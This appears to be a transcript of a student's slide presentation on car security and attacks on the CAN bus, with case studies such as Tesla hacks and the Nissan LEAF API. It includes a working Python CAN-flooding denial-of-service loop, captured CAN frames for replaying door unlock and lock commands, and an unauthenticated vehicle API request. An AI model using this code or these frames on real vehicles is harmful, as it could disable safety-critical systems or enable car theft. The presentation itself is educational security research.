Car Security

Transcript

1. Car Security Attacking On the CAN Bus Student : Tien-Chih

   Lin@NCKU Advisor : PK, Birdman, Benson, Alan

2. $ Outline • Attack Vector • Intro of CAN Bus

   • Security Issues on CAN Bus • Conclusion

3. >_ Attack Vector

4. $ Attack Vector Overview

5. $ Physical Attack • Attack Interface • USB Ports •

   SD-Card Ports • CD-ROM / DVD-ROM • Touch Screen • CAT-5

6. $ Case Study : CAT-5 • DEFCON 23 - How

   to Hack a Tesla Model S
7. None

8. $ Scanning with nmap Device IP Port Service CID (Central

   Information Display) 192.168.90.100 22/tcp ssh 53/tcp domain 80/tcp http 111/tcp rpcbind 2049/tcp nfs 6000/tcp X11 IC (Instrument Cluster) 192.168.90.101 22/tcp ssh 111/tcp rpcbind 6000/tcp X11 Gateway 192.168.90.102 23/tcp telnet 1050/tcp java-or-OTGfileshare
9. None
10. None

11. $ Remote Attack • Attack Interface • Bluetooth • Wi-Fi

    • Cellular Connection • Remote Keyless Entry • TPMS

12. $ Case Study : Remote Keyless Entry • Fix Code

    UID, btn UID, btn

13. $ Case Study : Remote Keyless Entry • Rolling Code

    UID, enck ctr′, btn UID, enck ctr′ + 1 , btn UID, enck ctr′ + 2 , btn ctr ctr + ∆ validity windows Decrypt ctr’ if(ctr < ctr’ < ctr + ∆ ) ctr := ctr’ open/close

14. $ Case Study : Remote Keyless Entry • Attack Rolling

    Code enck UID, ctr′, btn Attack crypto Attack key management

15. $ Wireless Hacking Unlock 100 Million Volkswagens, 2016

16. $ Case Study : API • Controlling vehicle features of

    Nissan LEAFs across the globe via vulnerable APIs

17. $ Request • GET https://[redacted].com/orchestration_1111/g dc/RemoteACRecordsRequest.php?RegionCo de=NE&lg=noNO&DCMID=&VIN=SJNFAAZE0 U60XXXXX

18. { status: 200, message: "success", BatteryStatusRecords: { OperationResult: "START", OperationDateAndTime:

    "jan 21, 2016 21:47", BatteryStatus: { Battery ChargingStatus: "NORMAL_CHARGING", BatteryCapacity: "12", BatteryRemainingAmount: "12", BatteryRemainingAmountWH: "", }, PluginState: "CONNECTED", CruisingRangeAcOn: "135664.0", Cruising RangeAcOff: "157904.0", NotificationDateAndTime: "2016/01/21 20:47", TargetDate: "2016/01/21 20:47" } } $ Respond

19. $ API without Authentication • GET https://[redacted].com/orchestration_1111/g dc/RemoteACRecordsRequest.php?RegionCo de=NE&lg=noNO&DCMID=&VIN=SJNFAAZE0 U60XXXXX

    • VIN : Vehicle Identification Number
20. None

21. $ Case Study : Wi-Fi • Black Hat 2017 :

    Free-fall: Tesla Hacking Get control of Wi-fi Exploit the Webkit Browser Root the in-vehicle system Patch and Disable AppArmor Bypass ECU’s firmware integrity verification Reprogram modified Gateway firmware Send malicious CAN msg on CAN Bus Get Control of CAN Bus CID ECUs

22. Why Hacking the CAN Bus?

23. >_ Intro of CAN Bus

24. $ What is CAN Bus? • Controller Area Network •

    Low cost, integrated controllers Head light Tail light Dash board Doors ABS Engine Control Suspension Control Gateway Low Speed CAN Body Control Bus High Speed CAN Powertrain Control Bus

25. $ CAN Data Frame Format Arbitration Identifier(ArbID) 11 bits or

    29 bits Data Length Code (DLC) 4 bits Data Up to 8 Byte

26. $ CAN Bus Arbitration • Support by Hardware • Software

    implementation becomes easily and immediacy. • priority : 0 > 1

27. $ Fault Confinement Error Active Error Passive Bus Off Reset

    and Config REC => 127 or TEC => 127 TEC > 255 Reset, Config and Reception of 128x11 Recessive Bits REC < 127 or TEC < 127 REC: Receive Error Counter TEC: Transmit Error Counter

28. >_ Security Issues on CAN Bus

29. $ Denial-of-Service import ics device = ics.find_devices()[0] ics.open_device(device) NetworkID =

    ics.NETID_HSCAN ics.set_bit_rate(device,500000,NetworkID) msg = ics.SpyMessage() # Setup the message msg.ArbIDOrHeader = 0x0 # CAN ID msg.NetworkID = NetworkID # Channel 1 on the ValueCAN msg.Data = (0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) while(1): ics.transmit_messages(device, msg)

30. $ Testbed

31. $ Result

32. $ Replay Attack Head light Tail light Dash board Doors

    ABS Engine Control Suspension Control Gateway Attacker

33. $ Testbed

34. $ Unlock the Door ArbID Data… 44D 4D,00,80,00,00,00,00,00 440 40,00,80,11,01,0F,0F,0F

    442 42,00,80,00,00,00,00,00 44D 4D,01,80,00,01,00,00,00 440 40,01,80,11,01,00,00,00 631 18,80,53,04,00,12,00,00

35. $ Lock the Door ArbID Data… 44D 4D,00,80,00,00,00,00,00 440 40,00,80,11,01,0F,0F,0F

    442 42,00,80,00,00,00,00,00 44D 4D,01,80,00,01,00,00,00 440 40,01,80,11,01,00,00,00 631 18,80,53,02,00,12,00,00

36. $ Demo

37. >_ Conclusion • Survey of the Car Security − The

    skill of cyber security is useful in Car security. • CAN Bus − A useful protocol before the car connect to the Internet. − Easy attack by DoS and replay attack.

38. $ Reference • https://hitcon.org/2018/CMT/slide-files/d2_s0_r0_keynote.pdf • http://www.blackhat.com/docs/asia-15/materials/asia-15-Evenchick-Hopping-On- The-Can-Bus.pdf • http://www.cheyun.com/content/15847 •

    http://illmatics.com/carhacking.html • https://www.tomshardware.co.uk/intel-automotive-security-review-board,news- 51291.html • https://blog.lookout.com/hacking-a-tesla • https://www.blackhat.com/docs/us-17/thursday/us-17-Nie-Free-Fall-Hacking-Tesla- From-Wireless-To-CAN-Bus.pdf • https://www.cryptacus.eu/en/wp-content/uploads/201611_WG4_Garcia.pdf • https://www.troyhunt.com/controlling-vehicle-features-of-nissan/ • http://wiki.csie.ncku.edu.tw/embedded/CAN • https://goo.gl/kXyyhx